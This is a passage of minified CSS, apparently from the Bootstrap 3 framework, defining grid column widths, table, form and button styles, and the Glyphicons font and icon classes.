"}.row:after{clear:both}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11,.col-sm-12,.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11,.col-md-12,.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11,.col-lg-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11{float:left}.col-xs-1{width:8.333333333333332%}.col-xs-2{width:16.666666666666664%}.col-xs-3{width:25%}.col-xs-4{width:33.33333333333333%}.col-xs-5{width:41.66666666666667%}.col-xs-6{width:50%}.col-xs-7{width:58.333333333333336%}.col-xs-8{width:66.66666666666666%}.col-xs-9{width:75%}.col-xs-10{width:83.33333333333334%}.col-xs-11{width:91.66666666666666%}.col-xs-12{width:100%}@media(min-width:768px){.container{max-width:750px}.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11{float:left}.col-sm-1{width:8.333333333333332%}.col-sm-2{width:16.666666666666664%}.col-sm-3{width:25%}.col-sm-4{width:33.33333333333333%}.col-sm-5{width:41.66666666666667%}.col-sm-6{width:50%}.col-sm-7{width:58.333333333333336%}.col-sm-8{width:66.66666666666666%}.col-sm-9{width:75%}.col-sm-10{width:83.33333333333334%}.col-sm-11{width:91.66666666666666%}.col-sm-12{width:100%}.col-sm-push-1{left:8.333333333333332%}.col-sm-push-2{left:16.666666666666664%}.col-sm-push-3{left:25%}.col-sm-push-4{left:33.33333333333333%}.col-sm-push-5{left:41.66666666666667%}.col-sm-push-6{left:50%}.col-sm-push-7{left:58.333333333333336%}.col-sm-push-8{left:66.66666666666666%}.col-sm-push-9{left:75%}.col-sm-push-10{left:83.33333333333334%}.col-sm-push-11{left:91.66666666666666%}.col-sm-pull-1{right:8.333333333333332%}.col-sm-pull-2{right:16.666666666666664%}.col-sm-pull-3{right:25%}.col-sm-pull-4{right:33.33333333333333%}.col-sm-pull-5{right:41.66666666666667%}.col-sm-pull-6{right:50%}.col-sm-pull-7{right:58.333333333333336%}.col-sm-pull-8{right:66.66666666666666%}.col-sm-pull-9{right:75%}.col-sm-pull-10{right:83.33333333333334%}.col-sm-pull-11{right:91.66666666666666%}.col-sm-offset-1{margin-left:8.333333333333332%}.col-sm-offset-2{margin-left:16.666666666666664%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333333333%}.col-sm-offset-5{margin-left:41.66666666666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.333333333333336%}.col-sm-offset-8{margin-left:66.66666666666666%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333333334%}.col-sm-offset-11{margin-left:91.66666666666666%}}@media(min-width:992px){.container{max-width:970px}.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11{float:left}.col-md-1{width:8.333333333333332%}.col-md-2{width:16.666666666666664%}.col-md-3{width:25%}.col-md-4{width:33.33333333333333%}.col-md-5{width:41.66666666666667%}.col-md-6{width:50%}.col-md-7{width:58.333333333333336%}.col-md-8{width:66.66666666666666%}.col-md-9{width:75%}.col-md-10{width:83.33333333333334%}.col-md-11{width:91.66666666666666%}.col-md-12{width:100%}.col-md-push-0{left:auto}.col-md-push-1{left:8.333333333333332%}.col-md-push-2{left:16.666666666666664%}.col-md-push-3{left:25%}.col-md-push-4{left:33.33333333333333%}.col-md-push-5{left:41.66666666666667%}.col-md-push-6{left:50%}.col-md-push-7{left:58.333333333333336%}.col-md-push-8{left:66.66666666666666%}.col-md-push-9{left:75%}.col-md-push-10{left:83.33333333333334%}.col-md-push-11{left:91.66666666666666%}.col-md-pull-0{right:auto}.col-md-pull-1{right:8.333333333333332%}.col-md-pull-2{right:16.666666666666664%}.col-md-pull-3{right:25%}.col-md-pull-4{right:33.33333333333333%}.col-md-pull-5{right:41.66666666666667%}.col-md-pull-6{right:50%}.col-md-pull-7{right:58.333333333333336%}.col-md-pull-8{right:66.66666666666666%}.col-md-pull-9{right:75%}.col-md-pull-10{right:83.33333333333334%}.col-md-pull-11{right:91.66666666666666%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.333333333333332%}.col-md-offset-2{margin-left:16.666666666666664%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333333333%}.col-md-offset-5{margin-left:41.66666666666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.333333333333336%}.col-md-offset-8{margin-left:66.66666666666666%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333333334%}.col-md-offset-11{margin-left:91.66666666666666%}}@media(min-width:1200px){.container{max-width:1170px}.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11{float:left}.col-lg-1{width:8.333333333333332%}.col-lg-2{width:16.666666666666664%}.col-lg-3{width:25%}.col-lg-4{width:33.33333333333333%}.col-lg-5{width:41.66666666666667%}.col-lg-6{width:50%}.col-lg-7{width:58.333333333333336%}.col-lg-8{width:66.66666666666666%}.col-lg-9{width:75%}.col-lg-10{width:83.33333333333334%}.col-lg-11{width:91.66666666666666%}.col-lg-12{width:100%}.col-lg-push-0{left:auto}.col-lg-push-1{left:8.333333333333332%}.col-lg-push-2{left:16.666666666666664%}.col-lg-push-3{left:25%}.col-lg-push-4{left:33.33333333333333%}.col-lg-push-5{left:41.66666666666667%}.col-lg-push-6{left:50%}.col-lg-push-7{left:58.333333333333336%}.col-lg-push-8{left:66.66666666666666%}.col-lg-push-9{left:75%}.col-lg-push-10{left:83.33333333333334%}.col-lg-push-11{left:91.66666666666666%}.col-lg-pull-0{right:auto}.col-lg-pull-1{right:8.333333333333332%}.col-lg-pull-2{right:16.666666666666664%}.col-lg-pull-3{right:25%}.col-lg-pull-4{right:33.33333333333333%}.col-lg-pull-5{right:41.66666666666667%}.col-lg-pull-6{right:50%}.col-lg-pull-7{right:58.333333333333336%}.col-lg-pull-8{right:66.66666666666666%}.col-lg-pull-9{right:75%}.col-lg-pull-10{right:83.33333333333334%}.col-lg-pull-11{right:91.66666666666666%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.333333333333332%}.col-lg-offset-2{margin-left:16.666666666666664%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333333333%}.col-lg-offset-5{margin-left:41.66666666666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.333333333333336%}.col-lg-offset-8{margin-left:66.66666666666666%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333333334%}.col-lg-offset-11{margin-left:91.66666666666666%}}table{max-width:100%;background-color:transparent}th{text-align:left}.table{width:100%;margin-bottom:20px}.table thead>tr>th,.table tbody>tr>th,.table tfoot>tr>th,.table thead>tr>td,.table tbody>tr>td,.table tfoot>tr>td{padding:8px;line-height:1.428571429;vertical-align:top;border-top:1px solid #ddd}.table thead>tr>th{vertical-align:bottom;border-bottom:2px solid #ddd}.table caption+thead tr:first-child th,.table colgroup+thead tr:first-child th,.table thead:first-child tr:first-child th,.table caption+thead tr:first-child td,.table colgroup+thead tr:first-child td,.table thead:first-child tr:first-child td{border-top:0}.table tbody+tbody{border-top:2px solid #ddd}.table .table{background-color:#fff}.table-condensed thead>tr>th,.table-condensed tbody>tr>th,.table-condensed tfoot>tr>th,.table-condensed thead>tr>td,.table-condensed tbody>tr>td,.table-condensed tfoot>tr>td{padding:5px}.table-bordered{border:1px solid #ddd}.table-bordered>thead>tr>th,.table-bordered>tbody>tr>th,.table-bordered>tfoot>tr>th,.table-bordered>thead>tr>td,.table-bordered>tbody>tr>td,.table-bordered>tfoot>tr>td{border:1px solid #ddd}.table-bordered>thead>tr>th,.table-bordered>thead>tr>td{border-bottom-width:2px}.table-striped>tbody>tr:nth-child(odd)>td,.table-striped>tbody>tr:nth-child(odd)>th{background-color:#f9f9f9}.table-hover>tbody>tr:hover>td,.table-hover>tbody>tr:hover>th{background-color:#f5f5f5}table col[class*="col-"]{display:table-column;float:none}table td[class*="col-"],table th[class*="col-"]{display:table-cell;float:none}.table>thead>tr>td.active,.table>tbody>tr>td.active,.table>tfoot>tr>td.active,.table>thead>tr>th.active,.table>tbody>tr>th.active,.table>tfoot>tr>th.active,.table>thead>tr.active>td,.table>tbody>tr.active>td,.table>tfoot>tr.active>td,.table>thead>tr.active>th,.table>tbody>tr.active>th,.table>tfoot>tr.active>th{background-color:#f5f5f5}.table>thead>tr>td.success,.table>tbody>tr>td.success,.table>tfoot>tr>td.success,.table>thead>tr>th.success,.table>tbody>tr>th.success,.table>tfoot>tr>th.success,.table>thead>tr.success>td,.table>tbody>tr.success>td,.table>tfoot>tr.success>td,.table>thead>tr.success>th,.table>tbody>tr.success>th,.table>tfoot>tr.success>th{background-color:#dff0d8;border-color:#d6e9c6}.table-hover>tbody>tr>td.success:hover,.table-hover>tbody>tr>th.success:hover,.table-hover>tbody>tr.success:hover>td{background-color:#d0e9c6;border-color:#c9e2b3}.table>thead>tr>td.danger,.table>tbody>tr>td.danger,.table>tfoot>tr>td.danger,.table>thead>tr>th.danger,.table>tbody>tr>th.danger,.table>tfoot>tr>th.danger,.table>thead>tr.danger>td,.table>tbody>tr.danger>td,.table>tfoot>tr.danger>td,.table>thead>tr.danger>th,.table>tbody>tr.danger>th,.table>tfoot>tr.danger>th{background-color:#f2dede;border-color:#eed3d7}.table-hover>tbody>tr>td.danger:hover,.table-hover>tbody>tr>th.danger:hover,.table-hover>tbody>tr.danger:hover>td{background-color:#ebcccc;border-color:#e6c1c7}.table>thead>tr>td.warning,.table>tbody>tr>td.warning,.table>tfoot>tr>td.warning,.table>thead>tr>th.warning,.table>tbody>tr>th.warning,.table>tfoot>tr>th.warning,.table>thead>tr.warning>td,.table>tbody>tr.warning>td,.table>tfoot>tr.warning>td,.table>thead>tr.warning>th,.table>tbody>tr.warning>th,.table>tfoot>tr.warning>th{background-color:#fcf8e3;border-color:#fbeed5}.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warning:hover,.table-hover>tbody>tr.warning:hover>td{background-color:#faf2cc;border-color:#f8e5be}@media(max-width:768px){.table-responsive{width:100%;margin-bottom:15px;overflow-x:scroll;overflow-y:hidden;border:1px solid #ddd}.table-responsive>.table{margin-bottom:0;background-color:#fff}.table-responsive>.table>thead>tr>th,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>tbody>tr>td,.table-responsive>.table>tfoot>tr>td{white-space:nowrap}.table-responsive>.table-bordered{border:0}.table-responsive>.table-bordered>thead>tr>th:first-child,.table-responsive>.table-bordered>tbody>tr>th:first-child,.table-responsive>.table-bordered>tfoot>tr>th:first-child,.table-responsive>.table-bordered>thead>tr>td:first-child,.table-responsive>.table-bordered>tbody>tr>td:first-child,.table-responsive>.table-bordered>tfoot>tr>td:first-child{border-left:0}.table-responsive>.table-bordered>thead>tr>th:last-child,.table-responsive>.table-bordered>tbody>tr>th:last-child,.table-responsive>.table-bordered>tfoot>tr>th:last-child,.table-responsive>.table-bordered>thead>tr>td:last-child,.table-responsive>.table-bordered>tbody>tr>td:last-child,.table-responsive>.table-bordered>tfoot>tr>td:last-child{border-right:0}.table-responsive>.table-bordered>thead>tr:last-child>th,.table-responsive>.table-bordered>tbody>tr:last-child>th,.table-responsive>.table-bordered>tfoot>tr:last-child>th,.table-responsive>.table-bordered>thead>tr:last-child>td,.table-responsive>.table-bordered>tbody>tr:last-child>td,.table-responsive>.table-bordered>tfoot>tr:last-child>td{border-bottom:0}}fieldset{padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;margin-bottom:5px;font-weight:bold}input[type="search"]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input[type="radio"],input[type="checkbox"]{margin:4px 0 0;margin-top:1px \9;line-height:normal}input[type="file"]{display:block}select[multiple],select[size]{height:auto}select optgroup{font-family:inherit;font-size:inherit;font-style:inherit}input[type="file"]:focus,input[type="radio"]:focus,input[type="checkbox"]:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}input[type="number"]::-webkit-outer-spin-button,input[type="number"]::-webkit-inner-spin-button{height:auto}.form-control:-moz-placeholder{color:#999}.form-control::-moz-placeholder{color:#999}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.form-control{display:block;width:100%;height:34px;padding:6px 12px;font-size:14px;line-height:1.428571429;color:#555;vertical-align:middle;background-color:#fff;border:1px solid #ccc;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.form-control:focus{border-color:#66afe9;outline:0;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(102,175,233,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(102,175,233,0.6)}.form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{cursor:not-allowed;background-color:#eee}textarea.form-control{height:auto}.form-group{margin-bottom:15px}.radio,.checkbox{display:block;min-height:20px;padding-left:20px;margin-top:10px;margin-bottom:10px;vertical-align:middle}.radio label,.checkbox label{display:inline;margin-bottom:0;font-weight:normal;cursor:pointer}.radio input[type="radio"],.radio-inline input[type="radio"],.checkbox input[type="checkbox"],.checkbox-inline input[type="checkbox"]{float:left;margin-left:-20px}.radio+.radio,.checkbox+.checkbox{margin-top:-5px}.radio-inline,.checkbox-inline{display:inline-block;padding-left:20px;margin-bottom:0;font-weight:normal;vertical-align:middle;cursor:pointer}.radio-inline+.radio-inline,.checkbox-inline+.checkbox-inline{margin-top:0;margin-left:10px}input[type="radio"][disabled],input[type="checkbox"][disabled],.radio[disabled],.radio-inline[disabled],.checkbox[disabled],.checkbox-inline[disabled],fieldset[disabled] input[type="radio"],fieldset[disabled] input[type="checkbox"],fieldset[disabled] .radio,fieldset[disabled] .radio-inline,fieldset[disabled] .checkbox,fieldset[disabled] .checkbox-inline{cursor:not-allowed}.input-sm{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-sm{height:30px;line-height:30px}textarea.input-sm{height:auto}.input-lg{height:45px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}select.input-lg{height:45px;line-height:45px}textarea.input-lg{height:auto}.has-warning .help-block,.has-warning .control-label{color:#c09853}.has-warning .form-control{border-color:#c09853;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-warning .form-control:focus{border-color:#a47e3c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #dbc59e;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #dbc59e}.has-warning .input-group-addon{color:#c09853;background-color:#fcf8e3;border-color:#c09853}.has-error .help-block,.has-error .control-label{color:#b94a48}.has-error .form-control{border-color:#b94a48;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-error .form-control:focus{border-color:#953b39;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #d59392;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #d59392}.has-error .input-group-addon{color:#b94a48;background-color:#f2dede;border-color:#b94a48}.has-success .help-block,.has-success .control-label{color:#468847}.has-success .form-control{border-color:#468847;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-success .form-control:focus{border-color:#356635;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #7aba7b;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #7aba7b}.has-success .input-group-addon{color:#468847;background-color:#dff0d8;border-color:#468847}.form-control-static{padding-top:7px;margin-bottom:0}.help-block{display:block;margin-top:5px;margin-bottom:10px;color:#737373}@media(min-width:768px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.form-inline .form-control{display:inline-block}.form-inline .radio,.form-inline .checkbox{display:inline-block;padding-left:0;margin-top:0;margin-bottom:0}.form-inline .radio input[type="radio"],.form-inline .checkbox input[type="checkbox"]{float:none;margin-left:0}}.form-horizontal .control-label,.form-horizontal .radio,.form-horizontal .checkbox,.form-horizontal .radio-inline,.form-horizontal .checkbox-inline{padding-top:7px;margin-top:0;margin-bottom:0}.form-horizontal .form-group{margin-right:-15px;margin-left:-15px}.form-horizontal .form-group:before,.form-horizontal .form-group:after{display:table;content:" "}.form-horizontal .form-group:after{clear:both}.form-horizontal .form-group:before,.form-horizontal .form-group:after{display:table;content:" "}.form-horizontal .form-group:after{clear:both}@media(min-width:768px){.form-horizontal .control-label{text-align:right}}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:normal;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.btn:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn:hover,.btn:focus{color:#333;text-decoration:none}.btn:active,.btn.active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,0.125);box-shadow:inset 0 3px 5px rgba(0,0,0,0.125)}.btn.disabled,.btn[disabled],fieldset[disabled] .btn{pointer-events:none;cursor:not-allowed;opacity:.65;filter:alpha(opacity=65);-webkit-box-shadow:none;box-shadow:none}.btn-default{color:#333;background-color:#fff;border-color:#ccc}.btn-default:hover,.btn-default:focus,.btn-default:active,.btn-default.active,.open .dropdown-toggle.btn-default{color:#333;background-color:#ebebeb;border-color:#adadad}.btn-default:active,.btn-default.active,.open .dropdown-toggle.btn-default{background-image:none}.btn-default.disabled,.btn-default[disabled],fieldset[disabled] .btn-default,.btn-default.disabled:hover,.btn-default[disabled]:hover,fieldset[disabled] .btn-default:hover,.btn-default.disabled:focus,.btn-default[disabled]:focus,fieldset[disabled] .btn-default:focus,.btn-default.disabled:active,.btn-default[disabled]:active,fieldset[disabled] .btn-default:active,.btn-default.disabled.active,.btn-default[disabled].active,fieldset[disabled] .btn-default.active{background-color:#fff;border-color:#ccc}.btn-primary{color:#fff;background-color:#428bca;border-color:#357ebd}.btn-primary:hover,.btn-primary:focus,.btn-primary:active,.btn-primary.active,.open .dropdown-toggle.btn-primary{color:#fff;background-color:#3276b1;border-color:#285e8e}.btn-primary:active,.btn-primary.active,.open .dropdown-toggle.btn-primary{background-image:none}.btn-primary.disabled,.btn-primary[disabled],fieldset[disabled] .btn-primary,.btn-primary.disabled:hover,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary:hover,.btn-primary.disabled:focus,.btn-primary[disabled]:focus,fieldset[disabled] .btn-primary:focus,.btn-primary.disabled:active,.btn-primary[disabled]:active,fieldset[disabled] .btn-primary:active,.btn-primary.disabled.active,.btn-primary[disabled].active,fieldset[disabled] .btn-primary.active{background-color:#428bca;border-color:#357ebd}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning:hover,.btn-warning:focus,.btn-warning:active,.btn-warning.active,.open .dropdown-toggle.btn-warning{color:#fff;background-color:#ed9c28;border-color:#d58512}.btn-warning:active,.btn-warning.active,.open .dropdown-toggle.btn-warning{background-image:none}.btn-warning.disabled,.btn-warning[disabled],fieldset[disabled] .btn-warning,.btn-warning.disabled:hover,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning:hover,.btn-warning.disabled:focus,.btn-warning[disabled]:focus,fieldset[disabled] .btn-warning:focus,.btn-warning.disabled:active,.btn-warning[disabled]:active,fieldset[disabled] .btn-warning:active,.btn-warning.disabled.active,.btn-warning[disabled].active,fieldset[disabled] .btn-warning.active{background-color:#f0ad4e;border-color:#eea236}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger:hover,.btn-danger:focus,.btn-danger:active,.btn-danger.active,.open .dropdown-toggle.btn-danger{color:#fff;background-color:#d2322d;border-color:#ac2925}.btn-danger:active,.btn-danger.active,.open .dropdown-toggle.btn-danger{background-image:none}.btn-danger.disabled,.btn-danger[disabled],fieldset[disabled] .btn-danger,.btn-danger.disabled:hover,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger:hover,.btn-danger.disabled:focus,.btn-danger[disabled]:focus,fieldset[disabled] .btn-danger:focus,.btn-danger.disabled:active,.btn-danger[disabled]:active,fieldset[disabled] .btn-danger:active,.btn-danger.disabled.active,.btn-danger[disabled].active,fieldset[disabled] .btn-danger.active{background-color:#d9534f;border-color:#d43f3a}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success:hover,.btn-success:focus,.btn-success:active,.btn-success.active,.open .dropdown-toggle.btn-success{color:#fff;background-color:#47a447;border-color:#398439}.btn-success:active,.btn-success.active,.open .dropdown-toggle.btn-success{background-image:none}.btn-success.disabled,.btn-success[disabled],fieldset[disabled] .btn-success,.btn-success.disabled:hover,.btn-success[disabled]:hover,fieldset[disabled] .btn-success:hover,.btn-success.disabled:focus,.btn-success[disabled]:focus,fieldset[disabled] .btn-success:focus,.btn-success.disabled:active,.btn-success[disabled]:active,fieldset[disabled] .btn-success:active,.btn-success.disabled.active,.btn-success[disabled].active,fieldset[disabled] .btn-success.active{background-color:#5cb85c;border-color:#4cae4c}.btn-info{color:#fff;background-color:#5bc0de;border-color:#46b8da}.btn-info:hover,.btn-info:focus,.btn-info:active,.btn-info.active,.open .dropdown-toggle.btn-info{color:#fff;background-color:#39b3d7;border-color:#269abc}.btn-info:active,.btn-info.active,.open .dropdown-toggle.btn-info{background-image:none}.btn-info.disabled,.btn-info[disabled],fieldset[disabled] .btn-info,.btn-info.disabled:hover,.btn-info[disabled]:hover,fieldset[disabled] .btn-info:hover,.btn-info.disabled:focus,.btn-info[disabled]:focus,fieldset[disabled] .btn-info:focus,.btn-info.disabled:active,.btn-info[disabled]:active,fieldset[disabled] .btn-info:active,.btn-info.disabled.active,.btn-info[disabled].active,fieldset[disabled] .btn-info.active{background-color:#5bc0de;border-color:#46b8da}.btn-link{font-weight:normal;color:#428bca;cursor:pointer;border-radius:0}.btn-link,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}.btn-link,.btn-link:hover,.btn-link:focus,.btn-link:active{border-color:transparent}.btn-link:hover,.btn-link:focus{color:#2a6496;text-decoration:underline;background-color:transparent}.btn-link[disabled]:hover,fieldset[disabled] .btn-link:hover,.btn-link[disabled]:focus,fieldset[disabled] .btn-link:focus{color:#999;text-decoration:none}.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-sm,.btn-xs{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-xs{padding:1px 5px}.btn-block{display:block;width:100%;padding-right:0;padding-left:0}.btn-block+.btn-block{margin-top:5px}input[type="submit"].btn-block,input[type="reset"].btn-block,input[type="button"].btn-block{width:100%}.fade{opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}.collapse{display:none}.collapse.in{display:block}.collapsing{position:relative;height:0;overflow:hidden;-webkit-transition:height .35s ease;transition:height .35s ease}@font-face{font-family:'Glyphicons Halflings';src:url('../fonts/glyphicons-halflings-regular.eot');src:url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'),url('../fonts/glyphicons-halflings-regular.woff') format('woff'),url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'),url('../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular') format('svg')}.glyphicon{position:relative;top:1px;display:inline-block;font-family:'Glyphicons Halflings';-webkit-font-smoothing:antialiased;font-style:normal;font-weight:normal;line-height:1}.glyphicon-asterisk:before{content:"\2a"}.glyphicon-plus:before{content:"\2b"}.glyphicon-euro:before{content:"\20ac"}.glyphicon-minus:before{content:"\2212"}.glyphicon-cloud:before{content:"\2601"}.glyphicon-envelope:before{content:"\2709"}.glyphicon-pencil:before{content:"\270f"}.glyphicon-glass:before{content:"\e001"}.glyphicon-music:before{content:"\e002"}.glyphicon-search:before{content:"\e003"}.glyphicon-heart:before{content:"\e005"}.glyphicon-star:before{content:"\e006"}.glyphicon-star-empty:before{content:"\e007"}.glyphicon-user:before{content:"\e008"}.glyphicon-film:before{content:"\e009"}.glyphicon-th-large:before{content:"\e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyphicon-off:before{content:"\e017"}.glyphicon-signal:before{content:"\e018"}.glyphicon-cog:before{content:"\e019"}.glyphicon-trash:before{content:"\e020"}.glyphicon-home:before{content:"\e021"}.glyphicon-file:before{content:"\e022"}.glyphicon-time:before{content:"\e023"}.glyphicon-road:before{content:"\e024"}.glyphicon-download-alt:before{content:"\e025"}.glyphicon-download:before{content:"\e026"}.glyphicon-upload:before{content:"\e027"}.glyphicon-inbox:before{content:"\e028"}.glyphicon-play-circle:before{content:"\e029"}.glyphicon-repeat:before{content:"\e030"}.glyphicon-refresh:before{content:"\e031"}.glyphicon-list-alt:before{content:"\e032"}.glyphicon-flag:before{content:"\e034"}.glyphicon-headphones:before{content:"\e035"}.glyphicon-volume-off:before{content:"\e036"}.glyphicon-volume-down:before{content:"\e037"}.glyphicon-volume-up:before{content:"\e038"}.glyphicon-qrcode:before{content:"\e039"}.glyphicon-barcode:before{content:"\e040"}.glyphicon-tag:before{content:"\e041"}.glyphicon-tags:before{content:"\e042"}.glyphicon-book:before{content:"\e043"}.glyphicon-print:before{content:"\e045"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-height:before{content:"\e050"}.glyphicon-text-width:before{content:"\e051"}.glyphicon-align-left:before{content:"\e052"}.glyphicon-align-center:before{content:"\e053"}.glyphicon-align-right:before{content:"\e054"}.glyphicon-align-justify:before{content:"\e055"}.glyphicon-list:before{content:"\e056"}.glyphicon-indent-left:before{content:"\e057"}.glyphicon-indent-right:before{content:"\e058"}.glyphicon-facetime-video:before{content:"\e059"}.glyphicon-picture:before{content:"\e060"}.glyphicon-map-marker:before{content:"\e062"}.glyphicon-adjust:before{content:"\e063"}.glyphicon-tint:before{content:"\e064"}.glyphicon-edit:before{content:"\e065"}.glyphicon-share:before{content:"\e066"}.glyphicon-check:before{content:"\e067"}.glyphicon-move:before{content:"\e068"}.glyphicon-step-backward:before{content:"\e069"}.glyphicon-fast-backward:before{content:"\e070"}.glyphicon-backward:before{content:"\e071"}.glyphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{content:"\e082"}.glyphicon-remove-sign:before{content:"\e083"}.glyphicon-ok-sign:before{content:"\e084"}.glyphicon-question-sign:before{content:"\e085"}.glyphicon-info-sign:before{content:"\e086"}.glyphicon-screenshot:before{content:"\e087"}.glyphicon-remove-circle:before{content:"\e088"}.glyphicon-ok-circle:before{content:"\e089"}.glyphicon-ban-circle:before{content:"\e090"}.glyphicon-arrow-left:before{content:"\e091"}.glyphicon-arrow-right:before{content:"\e092"}.glyphicon-arrow-up:before{content:"\e093"}.glyphicon-arrow-down:before{content:"\e094"}.glyphicon-share-alt:before{content:"\e095"}.glyphicon-resize-full:before{content:"\e096"}.glyphicon-resize-small:before{content:"\e097"}.glyphicon-exclamation-sign:before{content:"\e101"}.glyphicon-gift:before{content:"\e102"}.glyphicon-leaf:before{content:"\e103"}.glyphicon-eye-open:before{content:"\e105"}.glyphicon-eye-close:before{content:"\e106"}.glyphicon-warning-sign:before{content:"\e107"}.glyphicon-plane:before{content:"\e108"}.glyphicon-random:before{content:"\e110"}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-ret